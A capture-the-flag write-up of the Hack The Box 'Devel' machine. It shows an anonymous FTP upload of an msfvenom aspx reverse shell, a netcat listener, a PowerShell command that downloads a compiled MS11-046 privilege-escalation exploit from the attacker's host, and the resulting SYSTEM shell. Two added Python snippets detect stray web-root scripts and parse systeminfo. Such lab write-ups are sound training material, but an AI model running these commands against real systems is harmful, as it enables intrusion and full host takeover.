HackTheBox-Machines Devel Writeup

kazma, founder and president of the NCKU Cybersecurity Club (成大資安社)

First, a quick nmap scan:

└──╼ [★]$ nmap -sV --script vuln 10.129.153.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-27 06:29 CDT
Stats: 0:03:46 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.64% done; ETC: 06:33 (0:00:01 remaining)
Nmap scan report for 10.129.153.100
Host is up (0.077s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft IIS httpd 7.5
| vulners:
| cpe:/a:microsoft:internet_information_services:7.5:
| PACKETSTORM:180580 10.0 https://vulners.com/packetstorm/PACKETSTORM:180580 *EXPLOIT*
| MSF:AUXILIARY-DOS-WINDOWS-FTP-IIS75_FTPD_IAC_BOF- 10.0 https://vulners.com/metasploit/MSF:AUXILIARY-DOS-WINDOWS-FTP-IIS75_FTPD_IAC_BOF- *EXPLOIT*
| CVE-2010-3972 10.0 https://vulners.com/cve/CVE-2010-3972
| SSV:20122 9.3 https://vulners.com/seebug/SSV:20122 *EXPLOIT*
| CVE-2010-2730 9.3 https://vulners.com/cve/CVE-2010-2730
| SSV:20121 4.3 https://vulners.com/seebug/SSV:20121 *EXPLOIT*
| PACKETSTORM:180584 4.3 https://vulners.com/packetstorm/PACKETSTORM:180584 *EXPLOIT*
| MSF:AUXILIARY-DOS-WINDOWS-HTTP-MS10_065_II6_ASP_DOS- 4.3 https://vulners.com/metasploit/MSF:AUXILIARY-DOS-WINDOWS-HTTP-MS10_065_II6_ASP_DOS- *EXPLOIT*
| CVE-2010-1899 4.3 https://vulners.com/cve/CVE-2010-1899
| EDB-ID:15803 0.0 https://vulners.com/exploitdb/EDB-ID:15803 *EXPLOIT*
|_ EDB-ID:15167 0.0 https://vulners.com/exploitdb/EDB-ID:15167 *EXPLOIT*
|_http-server-header: Microsoft-IIS/7.5
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 263.50 seconds

FTP is open, and logging in as anonymous shows the following:

ftp> ftp 10.129.153.100
Connected to 10.129.153.100.
220 Microsoft FTP Service
Name (10.129.153.100:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||49157|)
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.

Opening the host in a browser shows the following page:
[image: ftp]
This tells us the FTP and HTTP servers share the same root directory. That is a serious problem: we can upload a malicious file over FTP and then trigger it over HTTP, for example a reverse shell.
For this we use the payload generator from the Metasploit framework.
The command below shows that aspx is a supported output format. The FTP listing also told us the directory names look ASP.NET-generated, and iisstart.htm is the standard IIS (Internet Information Services) start page, so the host is running a Microsoft IIS web server. Based on that, we generate the reverse shell as aspx.
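The misconfiguration here is that an anonymous-writable FTP root is also the IIS web root, so any script file that lands there becomes executable over HTTP. As an added example (not code from the original post), this Python parses the MS-DOS style listing Microsoft ftpd returns and flags server-side script files that are not part of a stock IIS 7.5 root; the listing is a constructed copy of the one above, with the uploaded rshell.aspx included so the check has something to report.

```python
import re
from datetime import datetime

# Constructed sample: the anonymous-FTP listing from the writeup, including
# rshell.aspx as it appeared after the upload, so the check has something to flag.
SAMPLE_LISTING = """\
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
10-28-24 01:39PM 3722 rshell.aspx
03-17-17 04:37PM 184946 welcome.png
"""

# Files a stock IIS 7.5 site ships with; anything else in the root is unexpected.
STOCK_IIS_ROOT = {"aspnet_client", "iisstart.htm", "welcome.png"}

# Extensions IIS hands to a script engine instead of serving as static content.
SERVER_SIDE_EXT = (".asp", ".aspx", ".ashx", ".asmx", ".config")

LINE_RE = re.compile(r"^(\d{2}-\d{2}-\d{2}) +(\d{2}:\d{2}[AP]M) +(<DIR>|\d+) +(.+)$")


def parse_msdos_listing(text):
    """Parse the MS-DOS style LIST output that Microsoft ftpd returns."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:  # skip 2xx status lines and anything that is not a listing row
            continue
        date, clock, size, name = m.groups()
        entries.append({
            "name": name,
            "is_dir": size == "<DIR>",
            "size": None if size == "<DIR>" else int(size),
            "mtime": datetime.strptime(f"{date} {clock}", "%m-%d-%y %I:%M%p"),
        })
    return entries


def unexpected_scripts(entries, baseline=STOCK_IIS_ROOT):
    """Names of server-side script files that are not part of the baseline.

    A hit means something executable reached the web root; on a host whose FTP
    and HTTP roots coincide, that is exactly the upload-then-browse path above.
    """
    return sorted(
        e["name"] for e in entries
        if not e["is_dir"]
        and e["name"].lower().endswith(SERVER_SIDE_EXT)
        and e["name"] not in baseline
    )
```

The same check works as a scheduled inventory of the web root on the server side, where a new .aspx appearing outside the deployed baseline is a high-confidence signal.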

└──╼ [★]$ msfvenom --list formats

Framework Executable Formats [--format <value>]
===============================================

Name
----
asp
aspx
aspx-exe
axis2
dll
ducky-script-psh
elf
elf-so
exe
exe-only
exe-service
exe-small
hta-psh
jar
jsp
loop-vbs
macho
msi
msi-nouac
osx-app
psh
psh-cmd
psh-net
psh-reflection
python-reflection
vba
vba-exe
vba-psh
vbs
war

With the command below we pick the most ordinary-looking payload:

└──╼ [★]$ msfvenom --list payloads | grep windows | grep reverse 

Generate the reverse shell:

└──╼ [★]$ msfvenom -p windows/x64/shell/reverse_tcp -f aspx lhost=tun0 lport=4444 rhost=10.129.151.61 -o rshell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of aspx file: 3675 bytes
Saved as: rshell.aspx

Generated! Next we upload it over FTP:

ftp> ftp 10.129.151.61
Connected to 10.129.151.61.
220 Microsoft FTP Service
Name (10.129.151.61:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put rshell.aspx
local: rshell.aspx remote: rshell.aspx
229 Entering Extended Passive Mode (|||49157|)
125 Data connection already open; Transfer starting.
100% |*************************************************************************************************| 3722 59.15 MiB/s --:-- ETA
226 Transfer complete.
3722 bytes sent in 00:00 (13.98 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||49158|)
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
10-28-24 01:39PM 3722 rshell.aspx
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp>

It turned out the payload above didn't work; switching to the one below succeeded:

└──╼ [★]$ msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.63 LPORT=4444 -o rshell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2719 bytes
Saved as: rshell.aspx

Then requesting the file in the browser triggers the reverse shell:

└──╼ [★]$ nc -nlvp 4444 
listening on [any] 4444 ...
connect to [10.10.14.63] from (UNKNOWN) [10.129.151.61] 49168
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>

Once inside, we don't even have permission to read the user flag yet, and we also find the server is x86, which explains why the first payload didn't work:

c:\Users>cd babis
cd babis
Access is denied.

c:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 137F-3971

Directory of c:\Users

18/03/2017 01:16 �� <DIR> .
18/03/2017 01:16 �� <DIR> ..
18/03/2017 01:16 �� <DIR> Administrator
17/03/2017 04:17 �� <DIR> babis
18/03/2017 01:06 �� <DIR> Classic .NET AppPool
14/07/2009 09:20 �� <DIR> Public
0 File(s) 0 bytes
6 Dir(s) 4.396.625.920 bytes free

c:\Users>systeminfo
systeminfo

Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31 ��
System Boot Time: 28/10/2024, 1:26:00 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 3.071 MB
Available Physical Memory: 2.456 MB
Virtual Memory: Max Size: 6.141 MB
Virtual Memory: Available: 5.535 MB
Virtual Memory: In Use: 606 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection 4
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP address(es)
[01]: 10.129.151.61
[02]: fe80::d981:e519:55b8:816
[03]: dead:beef::8870:1e16:d944:cf4e
[04]: dead:beef::d981:e519:55b8:816

From the above we can also tell the operating system is very old: it is the earliest release of Windows 7, which has many known vulnerabilities.
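The systeminfo output above carries the two facts the rest of the writeup turns on: the installed OS is 32-bit (so a windows/x64 payload cannot run, whatever the CPU line reports), and Build 7600 with no hotfixes is an unpatched RTM install. As an added example (not from the original post), this Python parses a constructed subset of that output and derives both, including the arch mismatch that made the first payload fail.

```python
import re

# Constructed sample: a subset of the systeminfo output shown in the writeup.
SAMPLE_SYSTEMINFO = """\
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz
Hotfix(s): N/A
Domain: HTB
"""


def parse_systeminfo(text):
    """Turn 'Key: value' lines into a dict; [NN] sub-items (CPUs, NICs, IPs) are skipped."""
    info = {}
    for line in text.splitlines():
        if ":" not in line or line.lstrip().startswith("["):
            continue
        key, value = line.split(":", 1)
        info[key.strip()] = value.strip()
    return info


def os_arch(info):
    """'X86-based PC' -> 'x86', 'x64-based PC' -> 'x64'.
    The CPU is x64-capable, but the OS is what decides which payloads can run."""
    return "x64" if info.get("System Type", "").lower().startswith("x64") else "x86"


def os_build(info):
    m = re.search(r"Build (\d+)", info.get("OS Version", ""))
    return int(m.group(1)) if m else None


def hotfix_count(info):
    """'N/A' means no hotfixes at all; otherwise the line reads 'N Hotfix(s) Installed.'"""
    m = re.match(r"(\d+)", info.get("Hotfix(s)", ""))
    return int(m.group(1)) if m else 0


def payload_arch(payload_name):
    """msfvenom puts the arch as a path component (windows/x64/...); none means x86."""
    return "x64" if "/x64/" in payload_name else "x86"


def payload_matches_host(payload_name, info):
    return payload_arch(payload_name) == os_arch(info)
```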
We can use searchsploit to look up entries in the Exploit Database (exploit-db); the usage is shown below. First, google which Win7 x86 privilege-escalation exploits exist:
[image: db]
On that page the EDB-ID is shown at the top left, and we can use it like this:

└──╼ [★]$ searchsploit -u ## update
└──╼ [★]$ searchsploit -m 47176
Exploit: Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/47176
Path: /usr/share/exploitdb/exploits/windows_x86/local/47176.cpp
Codes: CVE-2019-1132
Verified: False
File Type: C source, ASCII text
Copied to: /home/kazma/47176.cpp

It turned out that one didn't document how to compile it, and I ran into many environment problems, so I switched to another one that does give its build command:

└──╼ [★]$ searchsploit -m 40564
Exploit: Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)
URL: https://www.exploit-db.com/exploits/40564
Path: /usr/share/exploitdb/exploits/windows_x86/local/40564.c
Codes: CVE-2011-1249, MS11-046
Verified: True
File Type: C source, ASCII text
Copied to: /home/kazma/40564.c

┌─[eu-dedivip-1]─[10.10.14.63]─[kazma@htb-wnzfbgnuq9]─[~]
└──╼ [★]$ i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

Then start Python's http.server so the target machine can download the payload from us:

└──╼ [★]$ python -m http.server 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Download it from the target machine:

c:\Users>powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.63:8000/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.63:8000/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"

Run the exploit:

c:\Users\Public\Downloads>40564.exe
40564.exe

c:\Windows\System32>whoami
whoami
nt authority\system

Machine owned!

Pwned !!!

[image: pwn]

  • Title: HackTheBox-Machines Devel Writeup
  • Author: kazma
  • Created at: 2024-10-27 19:27:24
  • Updated at: 2024-10-28 21:09:23
  • Link: https://kazma.tw/2024/10/27/HackTheBox-Machines-Devel-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.